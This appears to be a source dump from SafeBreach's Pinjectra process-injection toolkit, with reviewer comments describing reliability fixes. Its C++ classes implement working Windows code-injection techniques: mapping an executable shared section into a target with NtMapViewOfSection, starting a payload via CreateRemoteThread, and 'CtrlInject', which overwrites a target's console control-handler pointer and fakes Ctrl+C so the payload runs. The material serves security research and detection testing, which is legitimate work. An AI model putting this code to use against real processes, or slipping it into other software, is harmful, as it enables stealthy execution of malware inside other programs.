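// Places m_buf in process `pid` through a shared pagefile-backed section: the bytes are copied into OUR
// view, then the same section is mapped RWX into the target with NtMapViewOfSection. No
// WriteProcessMemory/VirtualAllocEx is ever issued against the target — which is why the process is
// deliberately opened WITHOUT PROCESS_VM_WRITE.
//
// Returns a malloc'd RUNTIME_MEM_ENTRY (caller frees) or NULL when any step fails; on failure no handle
// or local view is leaked (the original checked nothing and would memcpy into a NULL view or map into a
// NULL process handle). `tid` is not used by this writer.
RUNTIME_MEM_ENTRY* CreateFileMappingA_MapViewOfFile_OpenProcess_PNtMapViewOfSection::write(DWORD pid, DWORD tid)
{
    (void)tid;

    PNtMapViewOfSection = (NTSTATUS(*)(HANDLE, HANDLE, PVOID*, ULONG_PTR, SIZE_T, PLARGE_INTEGER, PSIZE_T, SECTION_INHERIT, ULONG, ULONG))GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtMapViewOfSection");
    if (PNtMapViewOfSection == NULL || this->m_buf == NULL || this->m_nbyte == 0)
        return NULL;

    // Section size as a (high, low) pair instead of silently truncating size_t to the low DWORD.
    const unsigned long long nbyte = this->m_nbyte;
    HANDLE fm = CreateFileMappingA(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, (DWORD)(nbyte >> 32), (DWORD)nbyte, NULL);
    if (fm == NULL)
        return NULL;

    char* map_addr = (char*)MapViewOfFile(fm, FILE_MAP_ALL_ACCESS, 0, 0, 0);
    if (map_addr == NULL) {
        CloseHandle(fm);
        return NULL;
    }
    memcpy(map_addr, this->m_buf, this->m_nbyte);

    // PROCESS_VM_OPERATION is what the remote NtMapViewOfSection needs; PROCESS_CREATE_THREAD is for the
    // execution technique that later consumes ret_entry->process (e.g. CodeViaCreateRemoteThread).
    HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD, FALSE, pid);
    if (hProcess == NULL) {
        UnmapViewOfFile(map_addr);
        CloseHandle(fm);
        return NULL;
    }

    // Let the kernel choose the remote base. "The default behavior for executable pages allocated is to be marked
    // valid call targets for CFG." (https://docs.microsoft.com/en-us/windows/desktop/api/memoryapi/nf-memoryapi-mapviewoffile)
    LPVOID lpMap = 0;
    SIZE_T viewsize = 0;
    NTSTATUS status = (*PNtMapViewOfSection)(fm, hProcess, &lpMap, 0, this->m_nbyte, nullptr, &viewsize, ViewUnmap, 0, PAGE_EXECUTE_READWRITE);
    if (status < 0 || lpMap == NULL) { // NT_SUCCESS is status >= 0
        CloseHandle(hProcess);
        UnmapViewOfFile(map_addr);
        CloseHandle(fm);
        return NULL;
    }

    RUNTIME_MEM_ENTRY* ret_entry = (RUNTIME_MEM_ENTRY*)malloc(sizeof(*ret_entry));
    if (ret_entry == NULL) {
        // The remote view stays mapped (no unmap routine is resolved in this file); release what we can locally.
        CloseHandle(hProcess);
        UnmapViewOfFile(map_addr);
        CloseHandle(fm);
        return NULL;
    }

    // Both views hold their own reference to the section object, so the handle is no longer needed.
    CloseHandle(fm);

    ret_entry->thread = NULL;
    ret_entry->process = hProcess;
    ret_entry->addr = map_addr;     // our LOCAL view of the bytes (kept as in the original)
    ret_entry->entry_point = lpMap; // the REMOTE base the target can execute
    // NOTE(review): `addr` is a local address while `entry_point` is remote. CodeViaCreateRemoteThread passes
    // `addr` as the new thread's parameter, which the target cannot dereference — confirm this is intended.

    return ret_entry;
}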
91 |
--------------------------------------------------------------------------------
/Pinjector/CFMA_MVOF_OP_PNMVOS.h:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
31 | #pragma once
32 |
33 | // Local Include's
34 | #include "WritingTechniques.h"
35 |
36 | #include "ntapi.h"
37 |
38 | // Classes
// SimpleMemoryWriter that delivers a fixed buffer through a shared section mapped RWX into the target
// (see write()). The class name lists the exact call sequence, which is the point of this corpus:
// each writer is one detectable API combination.
class CreateFileMappingA_MapViewOfFile_OpenProcess_PNtMapViewOfSection : public SimpleMemoryWriter
{
public:
    // `buf`/`nbyte` are borrowed; the caller keeps them alive until write() has run.
    CreateFileMappingA_MapViewOfFile_OpenProcess_PNtMapViewOfSection(void* buf, size_t nbyte)
        : m_buf(buf), m_nbyte(nbyte) {}
    ~CreateFileMappingA_MapViewOfFile_OpenProcess_PNtMapViewOfSection();

    // Maps the buffer into process `pid`; `tid` is accepted for interface symmetry. Returns NULL on failure.
    RUNTIME_MEM_ENTRY* write(DWORD pid, DWORD tid);

protected:
    void* m_buf;    // bytes to deliver
    size_t m_nbyte; // their length
};
56 |
--------------------------------------------------------------------------------
/Pinjector/CreateRemoteThread.cpp:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
31 | #include "CreateRemoteThread.h"
32 |
// Nothing to release: the writer is borrowed and the remote thread handle is closed inside inject().
CodeViaCreateRemoteThread::~CodeViaCreateRemoteThread() {}
36 |
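// Writes the payload with the configured writer, then starts a remote thread at the entry point.
//
// Returns true when the thread was created, false otherwise — the original returned
// `injected_thread == NULL`, i.e. TRUE on failure, the opposite of CodeViaCtrlInject::inject in this
// project; the sense is now consistent with that sibling. Also fixed: the writer's entry point is no
// longer written back into m_entry_point (a second inject() would have reused the first call's address),
// a NULL writer result is rejected instead of dereferenced, and our handle to the new thread is closed
// since nothing here waits on it.
boolean CodeViaCreateRemoteThread::inject(DWORD pid, DWORD tid) {
    RUNTIME_MEM_ENTRY* result = this->m_memwriter->write(pid, tid);
    if (result == NULL || result->process == NULL)
        return false;

    // A caller-supplied entry point wins; otherwise start wherever the writer says the code landed.
    void* entry = (this->m_entry_point != NULL) ? this->m_entry_point : result->entry_point;
    if (entry == NULL)
        return false;

    HANDLE injected_thread = CreateRemoteThread(result->process,
        NULL,
        0, (LPTHREAD_START_ROUTINE)entry,
        result->addr, // handed to the payload as its single argument
        0, NULL);
    if (injected_thread == NULL)
        return false;

    CloseHandle(injected_thread); // drop our reference; the thread keeps running in the target
    return true;
}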
53 |
--------------------------------------------------------------------------------
/Pinjector/CreateRemoteThread.h:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
31 | #pragma once
32 |
33 | // Local Include's
34 | #include "ExecutionTechnique.h"
35 | #include "WritingTechniques.h"
36 |
37 | // Classes
// The textbook execution technique: write with any SimpleMemoryWriter, then CreateRemoteThread at the
// entry point the writer reported (or at `entry`, if the caller supplied one).
class CodeViaCreateRemoteThread : public ExecutionTechnique
{
public:
    // `memwriter` is borrowed. `entry` overrides the writer's entry point when non-NULL.
    CodeViaCreateRemoteThread(SimpleMemoryWriter* memwriter, void* entry = NULL)
        : m_memwriter(memwriter), m_entry_point(entry) {}
    ~CodeViaCreateRemoteThread();

    // Runs the technique against `pid`/`tid`; see the .cpp for the meaning of the boolean result.
    boolean inject(DWORD pid, DWORD tid);

protected:
    SimpleMemoryWriter* m_memwriter; // places the payload
    void* m_entry_point;             // optional caller override of the start address
};
55 |
56 |
--------------------------------------------------------------------------------
/Pinjector/CtrlInject.cpp:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
31 | // Standard Include's
32 | #include
33 |
34 | // Local Include's
35 | #include "CtrlInject.h"
36 |
// Nothing to release: the writer is borrowed and inject() closes every handle it opens.
CodeViaCtrlInject::~CodeViaCtrlInject() {}
40 |
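// Simulates Ctrl+C in the target's console: a real Ctrl key-down/up through SendInput (this goes to the
// session's keyboard state and is visible to the user) bracketing a 'C' key-down posted straight to the
// console window.
static void send_ctrl_c(HWND console_window) {
    INPUT ip = { 0 };
    ip.type = INPUT_KEYBOARD;
    ip.ki.wVk = VK_CONTROL;
    ip.ki.dwFlags = 0; // key press
    SendInput(1, &ip, sizeof(INPUT));
    Sleep(100);
    PostMessageA(console_window, WM_KEYDOWN, 'C', 0);

    // release the Ctrl key
    Sleep(100);
    ip.ki.dwFlags = KEYEVENTF_KEYUP;
    SendInput(1, &ip, sizeof(INPUT));
}

// "CtrlInject": make the target run the payload from its own console control-handler thread.
// kernelbase keeps its default console handler in a global slot as an EncodePointer()-encoded pointer;
// we locate that slot in OUR kernelbase (same base in every process of a boot session), overwrite the
// target's copy with the payload address encoded with the TARGET's cookie (RtlEncodeRemotePointer),
// and then fake a Ctrl+C on the target's console. x64-only: the byte signature and 8-byte slot assume it.
//
// Returns true on success, false if any prerequisite is missing. Compared to the original, every lookup
// and handle is checked before use (a failed memmem would have meant WriteProcessMemory to address 0,
// a failed AttachConsole would have posted the key to OUR queue), the slot's previous contents are read
// back and restored verbatim instead of assuming they were the default handler, and the process handle
// is closed. The RUNTIME_MEM_ENTRY from the writer is still not freed (ownership not visible here).
boolean CodeViaCtrlInject::inject(DWORD pid, DWORD tid) {
    typedef NTSTATUS(*RtlEncodeRemotePointer_t)(HANDLE ProcessHandle, PVOID Pointer, PVOID* EncodedPointer);
    RtlEncodeRemotePointer_t PRtlEncodeRemotePointer =
        (RtlEncodeRemotePointer_t)GetProcAddress(GetModuleHandleA("ntdll"), "RtlEncodeRemotePointer");
    if (PRtlEncodeRemotePointer == NULL)
        return false; // not exported on older Windows builds

    // 1. Find kernelbase!DefaultHandler by its prologue, then the slot holding it encoded with our cookie.
    HMODULE kernelbase = GetModuleHandleA("kernelbase");
    MODULEINFO modinfo = { 0 };
    if (kernelbase == NULL || !GetModuleInformation(GetCurrentProcess(), kernelbase, &modinfo, sizeof(modinfo)))
        return false;
    DWORD size = modinfo.SizeOfImage;

    // sub rsp,28h; mov ecx,0C000013Ah (STATUS_CONTROL_C_EXIT) — a build-specific signature, hence the check.
    char* kernelbase_DefaultHandler = (char*)memmem(kernelbase, size, "\x48\x83\xec\x28\xb9\x3a\x01\x00\xc0", 9);
    if (kernelbase_DefaultHandler == NULL)
        return false;
    __int64 encoded = (__int64)EncodePointer(kernelbase_DefaultHandler);
    char* kernelbase_SingleHandler = (char*)memmem(kernelbase, size, &encoded, sizeof(encoded));
    if (kernelbase_SingleHandler == NULL)
        return false;

    // 2. Borrow the target's console long enough to learn its window, then go back to our own console.
    DWORD process_list[2];
    DWORD process_count = GetConsoleProcessList(process_list, 2);
    if (process_count < 2)
        return false; // nobody else on our console: cannot tell which process to reattach to
    DWORD parent_id = (process_list[0] != GetCurrentProcessId()) ? process_list[0] : process_list[1];

    FreeConsole();
    HWND hWindow = AttachConsole(pid) ? GetConsoleWindow() : NULL;
    FreeConsole();
    AttachConsole(parent_id);
    if (hWindow == NULL)
        return false; // PostMessageA(NULL, ...) would post to our own thread, not to the target's console

    // 3. Put the payload in the target.
    RUNTIME_MEM_ENTRY* result = this->m_memwriter->write(pid, tid);
    if (result == NULL || result->addr == NULL)
        return false;
    void* payload_addr = result->addr;
    CloseHandle(result->process); // reopened below with exactly the rights this step needs

    // 4. Swap the handler slot. PROCESS_VM_OPERATION is required by RtlEncodeRemotePointer;
    //    PROCESS_VM_READ is new and lets us save the slot's current value for an exact restore.
    HANDLE h = OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, pid);
    if (h == NULL)
        return false;

    boolean ok = false;
    __int64 saved_slot = 0;
    void* encoded_addr = NULL;
    if (ReadProcessMemory(h, kernelbase_SingleHandler, &saved_slot, sizeof(saved_slot), NULL)
        && (*PRtlEncodeRemotePointer)(h, payload_addr, &encoded_addr) >= 0 // NT_SUCCESS
        && WriteProcessMemory(h, kernelbase_SingleHandler, &encoded_addr, sizeof(encoded_addr), NULL)) {
        send_ctrl_c(hWindow);
        ok = true;

        // Restore exactly what the target had, not an assumed default handler.
        WriteProcessMemory(h, kernelbase_SingleHandler, &saved_slot, sizeof(saved_slot), NULL);
    }

    CloseHandle(h);
    return ok;
}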
123 |
--------------------------------------------------------------------------------
/Pinjector/CtrlInject.h:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
31 | #pragma once
32 |
33 | // Standard Include's
34 | #include
35 | #include
36 | #include
37 |
38 | // Local Include's
39 | #include "ExecutionTechnique.h"
40 | #include "WritingTechniques.h"
41 |
42 | extern "C"
43 | {
44 | #include "memmem.h"
45 | }
46 |
47 | // Classes
// Execution technique that hijacks the target's console control handler and fakes a Ctrl+C so the
// handler thread runs the payload; the payload itself is placed by the supplied SimpleMemoryWriter.
// Console-attached, x64 targets only (see the .cpp for why).
class CodeViaCtrlInject : public ExecutionTechnique
{
public:
    // `memwriter` is borrowed.
    CodeViaCtrlInject(SimpleMemoryWriter* memwriter) : m_memwriter(memwriter) {}
    ~CodeViaCtrlInject();

    // Runs the technique against `pid`; `tid` is passed through to the writer. true = success.
    boolean inject(DWORD pid, DWORD tid);

protected:
    SimpleMemoryWriter* m_memwriter; // places the payload before the handler swap
};
63 |
64 |
--------------------------------------------------------------------------------
/Pinjector/DynamicPayloads.h:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
31 | #pragma once
32 |
33 | // Standard Include's
34 | #include